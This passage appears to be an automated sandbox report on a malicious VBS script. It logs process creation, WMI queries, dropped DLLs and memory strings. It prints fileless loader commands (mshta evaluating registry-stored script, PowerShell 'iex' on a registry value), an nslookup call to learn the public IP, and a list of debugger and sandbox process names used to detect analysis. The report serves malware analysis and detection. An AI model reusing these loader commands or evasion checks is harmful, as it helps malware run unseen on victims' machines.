Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000015.00000002.780870851.000001EEE0E80000.00000002.00000001.sdmp, csc.exe, 00000018.00000002.791405788.0000024AD3D50000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.820880148.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000019.00000002.848753339.0000022984BCC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000019.00000002.848753339.0000022984BCC000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.820880148.0000000005A00000.00000002.00000001.sdmp

Source: C:\Windows\System32\control.exe	Code function: 25_2_00B74DCD push 3B000001h; retf		25_2_00B74DD2
Source: C:\Windows\System32\rundll32.exe	Code function: 39_2_0000027FF74C4DCD push 3B000001h; retf		39_2_0000027FF74C4DD2

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\marginal.roq	Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA

